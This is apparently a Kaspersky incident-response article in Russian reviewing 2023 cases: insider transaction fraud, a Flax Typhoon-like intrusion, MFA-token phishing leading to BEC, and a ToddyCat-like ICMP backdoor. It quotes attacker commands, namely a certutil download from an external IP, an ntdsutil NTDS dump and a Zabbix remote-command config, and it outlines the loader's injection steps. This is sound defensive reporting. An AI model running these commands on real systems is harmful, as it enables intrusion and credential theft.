В 2023 году глобальная команда экстренного реагирования на киберинциденты «Лаборатории Касперского» (GERT) участвовала в расследованиях инцидентов по всему миру, что позволило ее экспертам лучше понять угрозы и методы, используемые APT-группами, обычными операторами crimeware и в некоторых случаях даже сотрудниками компаний. Как уже отмечалось в нашем ежегодном отчете, самой распространенной угрозой в 2023 году стали программы-шифровальщики, при этом чаще всего услуги цифровой криминалистики, реагирования на инциденты и анализа вредоносного ПО (DFIRMA) запрашивались государственными учреждениями. Однако в этой статье мы не будем обсуждать угрозу шифрования файлов, а подробно рассмотрим отдельные случаи, которые привлекли наше внимание и были упомянуты во время вебинара, посвященного ежегодному отчету DFIRMA.
Попытка мошенничества со стороны сотрудников компании
Сотрудники одной государственной организации обнаружили внутренний сервис, который позволял создавать легитимные транзакции. Хотя это не были прямые денежные переводы, они могли привести к финансовым потерям в несколько миллионов долларов.
Рассмотрим ситуацию со злоупотреблением таким внутренним сервисом на примере следующего сценария (без привязки к конкретному клиенту):
Банк позволяет клиенту бесплатно открыть не более двух счетов, а за дополнительные счета взимает плату. Однако злоумышленник использовал внутреннюю систему, чтобы за вознаграждение создать несколько счетов для клиентов, которые не хотели платить банку. По заявлению организации, в результате этого инцидента она понесла убытки в размере более 20 миллионов долларов.
Для анализа эксперты запросили большое количество журналов, связанных с рассматриваемым приложением, а также сведения о доступе через VPN и сетевой активности, в результате чего были выявлены сотрудники, причастные к мошенническим действиям. Команда проанализировала два подтвержденных случая злоупотребления конфигурацией транзакций: в первом эксплуатировалась уязвимость в отладочном интерфейсе, а во втором имело место злоупотребление привилегиями в действующей учетной записи.
В первом случае эксперты GERT обнаружили ошибку конфигурации, из-за которой злоумышленники могли похищать файлы cookie других пользователей, чтобы затем маскироваться под них. Приложение в одной из анализируемых систем зафиксировало ошибку авторизации, сохранив при этом файлы cookie пользователя, столкнувшегося с этой ошибкой, что помогло нам его вычислить.
В другом случае один из пользователей изменил привилегии и данные другого пользователя, чтобы создавать от его имени дополнительные транзакции во внутреннем сервисе и попытаться скрыть исходные данные. Позже этот модифицированный пользователь воспользовался VPN из уже известной системы, где другой пользователь взаимодействовал с системой транзакций. Изначально его операции расценивались как легитимные, но впоследствии выяснилось, что они были частью вредоносной активности.
Преступная деятельность преимущественно осуществлялась через VPN-доступ к инфраструктуре, однако эксперты обнаружили, что новый пользователь, который обращался к системе транзакций из внутренней сети, демонстрировал аналогичное несанкционированное поведение.
Результаты анализа, проведенного командой GERT, подтвердили факт соучастия пользователя, причастного к транзакционным запросам, а также позволили определить источники и связать активность этого пользователя с различными системами, вовлеченными в расследование, в том числе локальными и удаленными идентификаторами. Эта информация была своевременно использована заказчиком для привлечения к ответственности сотрудника и его сообщников.
Техники согласно базе знаний MITRE ATT&CK
Тактика | Используемая техника | Идентификатор техники | Подробности |
Первоначальный доступ Закрепление |
Существующие учетные записи | T1078 | Злоумышленники использовали легитимные учетные данные для доступа к VPN и внутреннему сервису. |
Первоначальный доступ | Внешние службы удаленного доступа | T1133 | Злоумышленник использовал VPN заказчика для получения сетевого доступа к внутреннему сервису. |
Получение учетных данных | Кража сессионных cookie | T1539 | Злоумышленник использовал ошибку в конфигурации сервиса транзакций для кражи файлов cookie других пользователей. |
Воздействие | Манипуляции с данными | T1565 | Выдав себя за других пользователей с правами на создание транзакций, злоумышленник начал создавать несанкционированные транзакции от их имени. |
APT-атака Flax Typhoon/SLIME13
После развертывания Kaspersky Managed Detection and Response (MDR) в инфраструктуре заказчика наши платформы обнаружили, что без его ведома там было установлено популярное программное обеспечение.
Несмотря на легитимность этого ПО, с его помощью злоумышленники обеспечили постоянный доступ к рабочей среде жертвы.
В сентябре 2023 года сервис Kaspersky Managed Detection and Response обнаружил подозрительную службу на корпоративном хосте. Злоумышленники использовали технику, при которой имитировалась работа реального системного приложения conhost.exe, но сама служба при этом запускалась из нестандартной папки. Анализ, проведенный специалистами GERT, подтвердил, что это приложение не является системной службой, а имеет отношение к SoftEther VPN, легитимному многопротокольному ПО для организации VPN.
Фальшивое приложение conhost было загружено в систему легитимным локальным пользователем с помощью certutil, известной LOLBin-утилиты для Windows, а затем установлено через командную строку в качестве системной службы:
1 |
certutil.exe -urlcache -split -f hxxp://<публичный IP>/conhost.exe |
На другом хосте была замечена еще одна подозрительная служба, маскирующаяся под wshelper.dll. Этот DLL-файл связан с Zabbix-агентом, который обычно развертывается на объекте мониторинга для активного наблюдения за локальными ресурсами и приложениями.
Анализ образца подтвердил, что настройки конфигурационного файла разрешали выполнение удаленных команд, задействуя функции пассивных и активных проверок, доступных в Zabbix.
1 2 3 4 |
EnableRemoteCommands=1 LogFile=0 Server=0.0.0.0/0 ListenPort=5432 |
В настройках сетевого экрана для порта 5432 было создано правило, разрешающее его прослушивание. Для придания видимости легитимности правило было названо PGSQL.
Анализ специалистов GERT подтвердил, что атака осуществлялась на протяжении более двух лет. На ранних этапах атаки с помощью системных команд создавался дамп NTDS:
1 2 |
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q c:\windows\sysvol\domain\ntds\active directory\ntds.dit" |
В течение двух лет компрометации средства контроля безопасности обнаруживали и блокировали многочисленные попытки запуска приложений для пентестинга, таких как Mimikatz и Cobalt Strike. Однако легитимные программы, применяемые во вредоносных целях, оставались незамеченными до тех пор, пока заказчик не внедрил решение Kaspersky Managed Detection and Response. Анализ, проведенный специалистами GERT, подтвердил, что инфраструктура была скомпрометирована с середины 2021 года. Оставленные злоумышленниками артефакты и применяемые ими техники, тактики и процедуры похожи на те, что применяет APT-группа Flax Typhoon. Эта группа обычно использует минимум вредоносного ПО и специальных полезных нагрузок, в значительной степени полагаясь на легитимные приложения.
Техники согласно базе знаний MITRE ATT&CK
Тактика | Используемая техника | Идентификатор техники |
Первоначальный доступ | Эксплуатация общедоступного приложения | T1190 |
Подготовка ресурсов | Разработка собственных средств: вредоносное ПО | T1587.001 |
Получение учетных данных | Получение дампа учетных данных ОС: память процесса LSASS | T1003.001 |
Получение учетных данных | Получение дампа учетных данных ОС: диспетчер учетных записей безопасности (SAM) | T1003.002 |
Организация управления | Туннелирование протокола | T1572 |
Организация управления | Передача инструментов из внешней сети | T1105 |
Получение учетных данных | Метод перебора: распыление паролей | T1110.003 |
Выполнение | Эксплуатация уязвимостей в клиентском ПО | T1203 |
Дальнейшее распространение | Службы удаленного доступа: протокол удаленного рабочего стола | T1021.001 |
Дальнейшее распространение | Службы удаленного доступа: SMB / общие административные ресурсы Windows | T1021.002 |
Предотвращение обнаружения | Маскировка: подбор легитимного имени или расположения | T1036.005 |
Утрата контроля над MFA
После внедрения многофакторной аутентификации (MFA) для своих «критически важных сотрудников» финансовая организация подверглась целевой фишинговой атаке.
В ходе фишинговой атаки злоумышленники маскировались под популярную платформу DocuSign, а целью являлась определенная группа сотрудников. И хотя компания обнаружила фишинговую атаку и настроила правила, чтобы избежать подобных писем, некоторые пользователи все-таки получили и открыли вредоносное письмо.
Среди тех, кто непреднамеренно перешел по ссылке, был один из защищенных пользователей. Злоумышленники смогли получить контроль над его учетной записью благодаря фиш-киту, настроенному на автоматическую кражу MFA-токенов.
Первая фишинговая атака произошла 6 октября 2023 года, и аналитики GERT подтвердили, что одна из жертв открыла вредоносное письмо в тот же день, после чего последовали новые подключения из разных мест за пределами штаб-квартиры компании. Злоумышленники также настроили MFA на дополнительных устройствах, чтобы незаметно получать доступ к содержимому почтового ящика жертвы, не вмешиваясь в его работу.
Злоумышленники получали доступ к содержимому почтового ящика в течение нескольких дней, что позволило им изучить внутренние процессы и подготовить BEC-атаку.
Спустя месяц после получения первоначального доступа злоумышленники воспользовались привилегированной учетной записью электронной почты, для которой не была включена MFA. Эта новая учетная запись имела привилегии в Microsoft 365, позволяющие настраивать новые правила и параметры. Злоумышленники настроили привилегии «отправить как» от имени критически важных пользователей, работа которых была связана с утверждением и запросом денежных переводов. Также через эту учетную запись атакующие настроили правила пересылки, чтобы скрывать сообщения, полученные от определенного банка и от определенных пользователей.
После настройки необходимых привилегий и правил злоумышленники отправили новый запрос по электронной почте на основе легитимного шаблона, с помощью которого компания ранее запрашивала денежные переводы. Они приложили документы из скомпрометированной учетной записи, указав в них другой банковский счет назначения и запросив международный перевод на сумму более 300 000 долларов США.
Получив запрос, банк обработал перевод в обычном порядке, не усомнившись в легитимности источника и приложенных документах.
С адреса электронной почты банка заказчику было отправлено уведомление о подтверждении перевода. Поскольку этот адрес электронной почты не был указан в правилах пересылки злоумышленников, сообщение было доставлено в почтовый ящик заказчика. Получив его, заказчик решил выяснить, кому принадлежит привилегированная почтовая учетная запись.
В ходе анализа специалисты GERT подтвердили дату и вектор первоначальной атаки, количество скомпрометированных пользователей и все техники, использованные злоумышленниками, а также предложили рекомендации по защите и мониторингу облачных активов. Проанализировав журналы доступа пользователей, облачные журналы, а также записи сетевого экрана и системные журналы клиента, эксперты GERT смогли составить полную хронологию событий и подробно описать все техники, использованные мошенниками.
Техники согласно базе знаний MITRE ATT&CK
Тактика | Используемая техника | Идентификатор техники | Подробности |
Первоначальный доступ | Фишинг: целевой фишинг со ссылкой | T1566.002 | Целенаправленная атака на домен заказчика, начавшаяся 6 октября 2023 года. |
Закрепление | Манипуляции с учетной записью: регистрация устройства | T1098.005 | Для скомпрометированного пользователя включено несколько методов аутентификации. |
Получение учетных данных | Метод перебора: угадывание пароля | T1110.001 | Неудачные попытки доступа от имени нескольких пользователей. |
Получение учетных данных | Метод перебора: распыление паролей | T1110.003 | Пробные попытки доступа с использованием учетных данных, признанных похищенными стилерами. |
Повышение привилегий | Манипуляции с учетной записью: выдача дополнительных прав учетной записи электронной почты | T1098.002 | Новое разрешение было настроено так, чтобы избежать обнаружения и получить доступ к различным почтовым ящикам. |
Закрепление | Сбор электронной почты: правила пересылки электронной почты | T1114.003 | Новые правила были настроены так, чтобы избежать обнаружения и позволить злоумышленникам закрепиться. |
APT-атака, похожая на ToddyCat, с использованием ICMP-бэкдора
Сервис Kaspersky Managed and Detection Response (MDR) получил сигнал о подозрительной активности на контроллерах домена и серверах Exchange.
Компания обратилась в GERT для расследования этого инцидента. Наш анализ подтвердил факт злоупотребления SMB и эксплуатации службы IKEEXT, а также использование уязвимости, позволяющей удаленно выполнить код на сервере Microsoft Exchange (CVE-2021-26855).
Закрепление реализовано через службу IKEEXT, что довольно необычно. Сведения о соответствующей уязвимости и эксплойт к ней впервые опубликовала исследовательская лаборатория High-Tech Bridge Security Research Lab в 2012 году. Уязвимость была связана с библиотекой wlbsctrl.dll и первоначально использовалась для повышения привилегий. Вскоре после публикации эксплойта Microsoft устранила уязвимость. Однако наши аналитики подтвердили, что эта же библиотека теперь выступает в роли механизма закрепления для вредоносного ПО.
IKEEXT является стандартной службой в Windows. Она запускается процессом svchost, который загружает ikeext.dll, динамическую библиотеку, отвечающую за работу службы IKEEXT.
Библиотека ikeext.dll, в свою очередь, загружает wlbsctrl.dll, что является стандартным поведением Windows. Хотя служба svchost всегда запущена в системе, по умолчанию в ней нет файла wlbsctrl.dll, что открывает лазейку для злоумышленников.
Атакующие создали вредоносную версию wlbsctrl.dll и сохранили ее в системе. Судя по поведению Windows, этот DLL-файл запускается при каждом старте системы без регистрации в автозагрузке, которая обычно используется для закрепления.
Уязвимость IKEEXT позволила не только закрепиться в системе, но и обеспечить дальнейшее распространение через протокол SMB. Также злоумышленник создал пользовательское правило сетевого экрана под названием «DLL Surrogate», разрешающее dllhost.exe прослушивать произвольный порт 52415. Всего этого удалось достичь, поместив wlbsctrl.dll с бэкдором в папку system32, где обычно хранится легитимная библиотека (если та присутствует в системе).
Позже злоумышленник внедрил ICMP-бэкдор. После обнаружения бэкдора специалисты «Лаборатории Касперского» выполнили проверку и детектировали еще два подобных образца за пределами инфраструктуры заказчика. Все обнаруженные образцы были похожи друг на друга, за исключением следующих моментов:
- Некоторые различия в заголовке PE (нормальное явление для похожих образцов).
- Разные строки мьютексов, расположенные по одному и тому же смещению необработанного файла.
- Разные байты по смещению 0x452–0x483 в необработанном файле, которые, по-видимому, являются бесполезным (недействующим) кодом.
Согласно результатам анализа, проведенного GERT, бэкдор выступал в роли загрузчика, настроенного на выполнение следующих действий:
- Проверка на наличие мьютекса — если тот уже существует в памяти, процесс завершается.
- Попытка прочитать файл %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res, расшифровать его содержимое по алгоритму AES с помощью ключа, прописанного в коде, и ключа, сформированного из серийного номера тома (VSN) диска C, затем использовать его для установки значения ключа реестра SOFTWARE\Classes\Interface {<вычисляется_для_каждого_хоста>}, после чего удалить файл.
- Загрузка содержимого стандартного значения ключа реестра SOFTWARE\Classes\Interface {<вычисляется_для_каждого_хоста>}, повторная расшифровка с помощью AES с использованием описанного выше ключа и вызов шелл-кода полезной нагрузки.
- Выделение памяти под размер шелл-кода в новом сегменте и переход к нему.
Обратите внимание, что вычисленное имя ключа реестра (Interface{<вычисляется_для_каждого_хоста>}) основано на VSN диска C и без VSN хоста корректная расшифровка невозможна.
В ходе анализа специалисты GERT обнаружили полезную нагрузку, хранящуюся в реестре Windows, и проанализировали ее, подтвердив описанное ниже поведение зашифрованной полезной нагрузки.
Расшифрованная полезная нагрузка содержит заголовок CAFEBABE (шестнадцатеричное «магическое» число, с которого начинаются class-файлы Java), затем размер шелл-кода и в конце данные. Эта полезная нагрузка выполняет следующие действия:
- Расшифровывает себя (в третий раз).
- Если она не запущена под dllhost.exe, создает временно приостановленный процесс dllhost с параметром /Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}, который относится к системной службе COM+.
- Выделяет память для нового процесса.
- Записывает секцию расшифрованной полезной нагрузки (начиная со смещения 0x1A03 и с размером, указанным в маленьком заголовке по смещению 0x19FF) в новую область памяти.
- Модифицирует dllhost (только в памяти) для обеспечения выполнения в только что выделенной области памяти.
- Возобновляет процесс dllhost.
Новый экземпляр шелл-кода начинает работу с первого шага. Он определяет, что действительно запущен под dllhost, расшифровывает новую секцию, выполняет ее и прослушивает порт 52415. Финальная полезная нагрузка, внедренная в dllhost.exe, вероятно, создает «сырой» ICMP-сокет без порта. Исходящее соединение не устанавливается (хотя полученная полезная нагрузка, скорее всего, передает данные наружу). Данные принимаются от неизвестного источника в виде ICMP-пакета в кодировке Base64, преобразуются в бинарный формат, расшифровываются и выполняются напрямую (выделение памяти с помощью функции VirtualAlloc), при этом шелл-код копируется в выделенную область памяти, к которой затем происходит прямое обращение.
Согласно данным наших платформ обработки данных об угрозах, используемые тактики, техники и процедуры (TTP) очень напоминают APT-атаки ToddyCat, однако достоверной информации о принадлежности к этой группе нет.
Целью преступников было закрепление в системе для наблюдения и последующего воздействия. Однако полученные данные не позволили сделать выводы о планах злоумышленников.
Техники согласно базе знаний MITRE ATT&CK
Тактика | Используемая техника | Идентификатор техники |
Подготовка ресурсов | Разработка собственных средств: эксплойты | T1587.004 |
Подготовка ресурсов | Разработка собственных средств: вредоносное ПО | T1587.001 |
Первоначальный доступ | Существующие учетные записи: доменные учетные записи | T1078.002 |
Первоначальный доступ | Существующие учетные записи: локальные учетные записи | T1078.003 |
Выполнение | Системные службы: запуск службы | T1569.002 |
Выполнение | Выполнение с участием пользователя: вредоносный файл | T1204.002 |
Закрепление | Создание или изменение системных процессов: служба Windows | T1543.003 |
Закрепление | Перехват потока исполнения: загрузка сторонних DLL-библиотек | T1574.002 |
Закрепление | Компонент серверного ПО: веб-шелл | T1505.003 |
Закрепление | Существующие учетные записи: доменные учетные записи | T1078.002 |
Предотвращение обнаружения | Обход механизмов контроля привилегий: обход контроля учетных записей | T1548.002 |
Предотвращение обнаружения | Прямой доступ к тому | T1006 |
Предотвращение обнаружения | Внесение изменений в реестр | T1112 |
Предотвращение обнаружения | Ослабление защиты: отключение или внесение изменений в настройки системного сетевого экрана | T1562.004 |
Предотвращение обнаружения | Ослабление защиты: отключение записи событий в журнал Windows | T1562.002 |
Предотвращение обнаружения | Устранение индикаторов: очистка журналов событий Windows | T1070.001 |
Предотвращение обнаружения | Устранение индикаторов: удаление файлов | T1070.004 |
Предотвращение обнаружения | Ослабление защиты: нарушение записи команд в журнал | T1562.003 |
Организация управления | Протоколы (кроме прикладного уровня) | T1095 |
Выводы
Хотя статистика показывает, что в прошлом году больше всего атак было на государственный сектор, операторы crimeware не слишком избирательны в выборе своих целей. Чтобы быть на шаг впереди злоумышленников, важно оценить состояние своих активов и обеспечить их постоянный мониторинг и защиту.
Тренд на кибератаки и вторжения, основанные на эксплуатации инфраструктурных активов или легитимных локальных приложений, требует внедрения дополнительных уровней мониторинга на основе анализа угроз. Сигналы от сервиса Kaspersky Managed Detection and Response (MDR) неоднократно становились отправной точкой для новых расследований благодаря возможностям детектирования угроз и способности аналитиков своевременно принимать необходимые меры.
Чтобы узнать больше о нашем отчете о реагировании на инциденты, предлагаем вам посмотреть запись вебинара Анализ киберинцидентов за прошлый год.
Самые интересные киберинциденты 2023 года